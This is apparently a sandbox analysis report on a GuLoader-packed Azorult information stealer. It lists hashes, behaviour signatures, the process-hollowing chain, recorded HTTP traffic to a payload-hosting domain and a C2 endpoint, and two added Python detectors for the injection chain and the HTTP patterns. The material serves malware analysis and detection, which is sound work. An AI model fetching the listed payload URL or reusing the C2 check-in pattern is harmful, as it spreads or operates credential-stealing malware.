Analysis

  • max time kernel
    53s
  • max time network
    59s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    19-11-2024 17:17

General

  • Target

    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe

  • Size

    543KB

  • MD5

    e555bbbffc72df8a3b14eafd48f36bbc

  • SHA1

    322db6d82578f212e8fb18c7880e9f9de44580b4

  • SHA256

    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b

  • SHA512

    a9ef31c67cc9e4c5c0ade06d37447978228e967139717b2201eb7acf67d17a5c556cc19927c8d5791b0022f8e3f259730cd85ae841806ef9f7e9234a113b0270

  • SSDEEP

    12288:32EI5cRYSzvuwIkyXS9bVVsKZIUvhnmd3ZhZw:3w6RfJIRIVaKZnmdPZw

Malware Config

Extracted

Family

azorult

C2

http://mhlc.shop/GI341/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Guloader family
  • Guloader,Cloudeye

A shellcode-based downloader first seen in 2020.

  • Loads dropped DLL 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    "C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:2548
    • C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
      "C:\Users\Admin\AppData\Local\Temp\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe"
      2⤵
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      PID:2964
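The tree above shows the loader stage: PID 2548 runs the sample, spawns a second copy of the same executable (PID 2964), and is credited with WriteProcessMemory, SetThreadContext and MapViewOfSection, while both processes hide threads from debuggers. The dropped System.dll under a ns*.tmp directory is the NSIS installer's System plugin, consistent with GuLoader's usual NSIS packaging. The following detection logic is an added example, not output of this sandbox: it replays a constructed event list that mirrors the report's process tree and flags any parent that creates a child and then rewrites both its memory and its thread context. Event field names (`type`, `api`, `target`) and the benign `C:\Tools\dbg.exe` pair are assumptions for illustration.

```python
"""Flag the parent-to-child self-injection chain shown in a process/API trace.

Added example, not sandbox output. EVENTS is constructed to mirror the report:
PID 2548 spawns a second copy of the same .exe (PID 2964) and touches it with
MapViewOfSection, WriteProcessMemory (x6) and SetThreadContext; both PIDs hide
threads from debuggers. Field names are assumptions; map them to your trace.
"""
from collections import defaultdict

SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe")

# Used by a parent against a child it just created, these rewrite the child's
# memory and execution context (process hollowing / thread hijacking).
INJECTION_APIS = {"WriteProcessMemory", "MapViewOfSection", "SetThreadContext"}
ANTI_DEBUG_APIS = {"NtSetInformationThread(HideFromDebugger)",
                   "NtCreateThreadEx(HideFromDebugger)"}

EVENTS = [  # constructed to match the report's tree
    {"type": "process_create", "pid": 2548, "ppid": 1400, "image": SAMPLE},
    {"type": "api", "pid": 2548, "api": "NtSetInformationThread(HideFromDebugger)"},
    {"type": "process_create", "pid": 2964, "ppid": 2548, "image": SAMPLE},
    {"type": "api", "pid": 2548, "api": "MapViewOfSection", "target": 2964},
    *([{"type": "api", "pid": 2548, "api": "WriteProcessMemory", "target": 2964}] * 6),
    {"type": "api", "pid": 2548, "api": "SetThreadContext", "target": 2964},
    {"type": "api", "pid": 2964, "api": "NtCreateThreadEx(HideFromDebugger)"},
    {"type": "api", "pid": 2964, "api": "NtSetInformationThread(HideFromDebugger)"},
    # Negative case (assumed): a debugger writing a child's memory without
    # SetThreadContext must not be reported.
    {"type": "process_create", "pid": 3000, "ppid": 1400, "image": r"C:\Tools\dbg.exe"},
    {"type": "process_create", "pid": 3001, "ppid": 3000, "image": r"C:\Tools\target.exe"},
    {"type": "api", "pid": 3000, "api": "WriteProcessMemory", "target": 3001},
]


def find_injection(events):
    """One finding per (parent, child) where the parent created the child and
    then used a memory-writing API *and* SetThreadContext on it."""
    images = {e["pid"]: e["image"] for e in events if e["type"] == "process_create"}
    parent_of = {e["pid"]: e["ppid"] for e in events if e["type"] == "process_create"}
    touched = defaultdict(set)  # (parent, child) -> APIs used across the boundary
    for e in events:
        if e["type"] == "api" and "target" in e and e["api"] in INJECTION_APIS:
            child = e["target"]
            if parent_of.get(child) == e["pid"]:  # only parent-on-own-child counts
                touched[(e["pid"], child)].add(e["api"])
    findings = []
    for (parent, child), apis in sorted(touched.items()):
        writes = apis & {"WriteProcessMemory", "MapViewOfSection"}
        if writes and "SetThreadContext" in apis:
            findings.append({
                "parent": parent,
                "child": child,
                # Same image path for parent and child is the hollowing tell.
                "same_image": images.get(parent) == images.get(child),
                "apis": sorted(apis),
            })
    return findings


def anti_debug_pids(events):
    """PIDs that hid a thread from debuggers (both stages in this report)."""
    return {e["pid"] for e in events
            if e["type"] == "api" and e["api"] in ANTI_DEBUG_APIS}


if __name__ == "__main__":
    for finding in find_injection(EVENTS):
        print(finding)
    print("anti-debug PIDs:", sorted(anti_debug_pids(EVENTS)))
```

Requiring both a write primitive and SetThreadContext against a process the caller itself spawned keeps debuggers and installers out of the results; the `same_image` flag is what separates a self-hollowing loader like this one from an injector that targets an unrelated process.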

Network

  • flag-us
    DNS
    mertvinc.com.tr
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    Remote address:
    8.8.8.8:53
    Request
    mertvinc.com.tr
    IN A
    Response
    mertvinc.com.tr
    IN A
    185.244.144.68
  • flag-tr
    GET
    http://mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    Remote address:
    185.244.144.68:80
    Request
    GET /LAbxmTzNBCWjnKNdG58.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: mertvinc.com.tr
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Connection: Keep-Alive
    Content-Type: application/octet-stream
    Last-Modified: Mon, 11 Nov 2024 12:17:10 GMT
    Etag: "1c040-6731f5c6-3fa9fa73f7b85d5c;;;"
    Accept-Ranges: bytes
    Content-Length: 114752
    Date: Tue, 19 Nov 2024 16:24:57 GMT
    Server: LiteSpeed
    X-Powered-By: PleskLin
  • flag-us
    DNS
    mhlc.shop
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    Remote address:
    8.8.8.8:53
    Request
    mhlc.shop
    IN A
    Response
    mhlc.shop
    IN A
    172.67.208.107
    mhlc.shop
    IN A
    104.21.23.20
  • flag-us
    POST
    http://mhlc.shop/GI341/index.php
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    Remote address:
    172.67.208.107:80
    Request
    POST /GI341/index.php HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
    Host: mhlc.shop
    Content-Length: 99
    Cache-Control: no-cache
    Response
    HTTP/1.1 403 Forbidden
    Date: Tue, 19 Nov 2024 17:18:24 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nmm%2FxT3HWFYVQbLZJt6gMi2n4fHm63j%2B2pCGy%2F9%2FMuxK20HadSeVtv7ZyxEeehZ4I371y7RweCOnSgTLADT9h9b9LFQNHZ%2FRzsOMa8AK%2BCRVF%2FmWBa90q0%2FmPww%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e51dbfc38f3be3e-DUB
  • 185.244.144.68:80
    http://mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
    http
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    2.4kB
    118.6kB
    48
    88

    HTTP Request

    GET http://mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin

    HTTP Response

    200
  • 172.67.208.107:80
    http://mhlc.shop/GI341/index.php
    http
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    582 B
    5.5kB
    7
    9

    HTTP Request

    POST http://mhlc.shop/GI341/index.php

    HTTP Response

    403
  • 8.8.8.8:53
    mertvinc.com.tr
    dns
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    61 B
    77 B
    1
    1

    DNS Request

    mertvinc.com.tr

    DNS Response

    185.244.144.68

  • 8.8.8.8:53
    mhlc.shop
    dns
    27ab1252f52866eca728cdbaaf3dcf4ba9c6c0b14a1d8c8973eb13ab2850cb2b.exe
    55 B
    87 B
    1
    1

    DNS Request

    mhlc.shop

    DNS Response

    172.67.208.107
    104.21.23.20
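Two distinct HTTP behaviours are recorded above: the GuLoader stage fetches an opaque .bin over plain HTTP with a Firefox 131 User-Agent that claims Windows NT 10.0 from a Windows 7 VM (so the string is hardcoded in the loader), and the unpacked Azorult posts a 99-byte body to /GI341/index.php with an IE6-era User-Agent. The check-in got a 403 served by Cloudflare, so no stealer upload was observed in this run. The matcher below is an added example, not part of the sandbox output: it parses raw HTTP request text and reports which of the two patterns it sees. Hosts, paths and User-Agent strings are the report's own indicators; the request texts are rebuilt from the report and the `www.example.com` request is constructed as a negative case.

```python
"""Match the two HTTP behaviours recorded under Network against raw request text.

Added example, not sandbox output. Indicators are taken from the report; the
request texts below are rebuilt from it and BENIGN_REQ is constructed.
"""
from dataclasses import dataclass, field

PAYLOAD_HOST = "mertvinc.com.tr"                       # GuLoader stage served here
C2_HOST, C2_PATH = "mhlc.shop", "/GI341/index.php"     # Azorult C2 (Malware Config)
AZORULT_UA = "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)"


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict = field(default_factory=dict)

    @property
    def host(self):
        return self.headers.get("host", "")


def parse_request(raw: str) -> HttpRequest:
    """Parse the request line and headers of one HTTP/1.x request."""
    lines = raw.strip("\r\n").splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers)


def classify(req: HttpRequest) -> list[str]:
    """Return the indicator/behaviour tags that a request matches (empty if none)."""
    findings = []
    # Exact indicators from the report.
    if req.host == PAYLOAD_HOST or (req.host == C2_HOST and req.path == C2_PATH):
        findings.append(f"known-indicator:{req.host}{req.path}")
    # Stage download: plain-HTTP GET of an opaque .bin with a browser-like UA.
    ua = req.headers.get("user-agent", "")
    if req.method == "GET" and req.path.lower().endswith(".bin") and "Firefox/" in ua:
        findings.append("guloader-style-payload-fetch")
    # Check-in: POST to index.php, IE6-era UA, tiny body (report shows 99 bytes).
    clen = int(req.headers.get("content-length", "0") or 0)
    if (req.method == "POST" and req.path.endswith("/index.php")
            and ua == AZORULT_UA and 0 < clen < 200):
        findings.append("azorult-style-checkin")
    return findings


# Request texts rebuilt from the report.
GULOADER_REQ = """GET /LAbxmTzNBCWjnKNdG58.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: mertvinc.com.tr
Cache-Control: no-cache
"""
AZORULT_REQ = """POST /GI341/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: mhlc.shop
Content-Length: 99
Cache-Control: no-cache
"""
BENIGN_REQ = """GET /index.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: www.example.com
"""  # constructed negative case

if __name__ == "__main__":
    for raw in (GULOADER_REQ, AZORULT_REQ, BENIGN_REQ):
        req = parse_request(raw)
        print(req.method, req.host, req.path, "->", classify(req) or "clean")
```

The host/path match is the brittle part and will age with the infrastructure; the two behavioural rules (a .bin fetched over plain HTTP with a browser UA, and a sub-200-byte POST to index.php carrying an IE6 User-Agent) are what to keep watching for once these domains rotate.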

MITRE ATT&CK Enterprise v15

Downloads

  • \Users\Admin\AppData\Local\Temp\nsj9EC0.tmp\System.dll

    Filesize

    11KB

    MD5

    75ed96254fbf894e42058062b4b4f0d1

    SHA1

    996503f1383b49021eb3427bc28d13b5bbd11977

    SHA256

    a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7

    SHA512

    58174896db81d481947b8745dafe3a02c150f3938bb4543256e8cce1145154e016d481df9fe68dac6d48407c62cbe20753320ebd5fe5e84806d07ce78e0eb0c4

  • memory/2548-9-0x0000000002C60000-0x0000000005312000-memory.dmp

    Filesize

    38.7MB

  • memory/2548-10-0x0000000002C60000-0x0000000005312000-memory.dmp

    Filesize

    38.7MB

  • memory/2548-11-0x0000000077911000-0x0000000077A12000-memory.dmp

    Filesize

    1.0MB

  • memory/2548-12-0x0000000077910000-0x0000000077AB9000-memory.dmp

    Filesize

    1.7MB

  • memory/2548-14-0x0000000002C60000-0x0000000005312000-memory.dmp

    Filesize

    38.7MB

  • memory/2964-13-0x0000000077910000-0x0000000077AB9000-memory.dmp

    Filesize

    1.7MB

  • memory/2964-15-0x00000000007E0000-0x0000000001842000-memory.dmp

    Filesize

    16.4MB

  • memory/2964-16-0x00000000007E0000-0x0000000001842000-memory.dmp

    Filesize

    16.4MB

  • memory/2964-17-0x00000000007E0000-0x0000000001842000-memory.dmp

    Filesize

    16.4MB
